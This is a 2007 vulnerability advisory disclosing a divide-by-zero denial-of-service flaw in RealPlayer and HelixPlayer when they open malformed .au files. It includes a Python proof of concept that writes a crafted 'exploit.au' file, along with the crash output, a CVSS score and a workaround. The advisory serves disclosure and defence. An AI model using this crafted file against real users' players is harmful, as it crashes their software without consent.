RealPlayer/HelixPlayer .au Divide-By-Zero Denial of Service Vulnerability

"OS2A BTO" <os2a.bto@xxxxxxxxx> · Tue, 11 Sep 2007 15:01:41 +0530

Advisory attached.

OS2A
RealPlayer/HelixPlayer .au Divide-By-Zero Denial of Service Vulnerability

OS2A ID: OS2A_1010			08/21/2007 Issue Discovered
					08/31/2007 Vendor Notification

Class: Denial of Service		Severity: High

Overview:
-------------
RealPlayer/Helix Player is a media player that will play popular media formats
as well as organize your music and videos.

Description:
--------------
A Denial of Service flaw exists in RealPlayer and HelixPlayer, when a user
tries to open a malformed .au file. The flaw is due to a Division by Zero error
when processing a malformed AU file.

An attacker must entice an unsuspecting user to open a maliciously crafted AU
file.

Impact:
--------
Successful exploitation allows an attacker to crash a vulnerable application
via a specially crafted file. (Deny the service).

Affected Software(s):
---------------------
Realplayer 10.1.0.3114 and prior 
Helixplayer

Tested on :
- RealPlayer-10.1.0.3114
- Realplayer-10.0.9 
- Realplayer-10.0.8 on FC6, RH9, RHEL and SuSE respectively
- Realplayer10-5Gold on Windows XP
- HelixPlayer-1.0.6.778 on FC6

AV MP3 Player and Media Player Classic are also found to be vulnerable

Affected Platform: 
------------------
Microsoft Windows (All Platform)
RedHat Linux
Fedora Core Linux
SuSE Linux

Proof of Concept:
------------------
The following Python program will generate a malformed .au file

import sys
import os

head = ("\x2E\x73\x6E\x64\x00\x00\x01\x18\x02\x01\x42\xDC\x00\x00\x00\x01"+

        "\x02\x02\x1F\x40\x00\x00\x00\x00\x00" +

        "\x31\x00\x00\x00\x01\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+

        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+

        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+

        "\x00\x00\x00\x00\x00\x00\x00\x00\x66\x66\x66\x00")

print "[x] RealPlayer/Helix Player/Kaboodle Player DoS"

try:
   f = open("exploit.au",'w')
except IOError, e:
    print "Unable to open file ", e
    sys.exit(0)

print "[x] File successfully opened for writing."
try:
   f.write(head)
except IOError, e:
    print "Unable to write to file ", e
    sys.exit(0)
print "[x] File successfully written."
f.close()
print "[x] Open exploit.au with RealPlayer/Helix/Kaboodle Players."

#End of program

RealPlayer crashes with the following exception,
Floating point exception$REALPLAYBIN "$@"

CVSS Score Report:
------------------
    ACCESS_VECTOR          = NETWORK
    ACCESS_COMPLEXITY      = MEDIUM
    AUTHENTICATION         = NOT_REQUIRED
    CONFIDENTIALITY_IMPACT = NONE
    INTEGRITY_IMPACT       = NONE
    AVAILABILITY_IMPACT    = COMPLETE
    EXPLOITABILITY         = PROOF_OF_CONCEPT
    REMEDIATION_LEVEL      = UNAVAILABLE
    REPORT_CONFIDENCE      = CONFIRMED
    CVSS Base Score        = 7.1 (AV:N/AC:M/Au:NR/C:N/I:N/A:C)
    CVSS Temporal Score    = 6.4
    Risk factor            = High

Reference: 
-----------
A similar attack was found recently against Windows Media Player,
http://www.safehack.com/exp/mp/mplayer11.txt

Solution/Work Around:
--------------------
Do not open untrusted .au files.

Credits:
--------
Nagendra Kumar G, Chandan S and Arun Kethipelly of OS2A have been credited with the discovery of this 
vulnerability.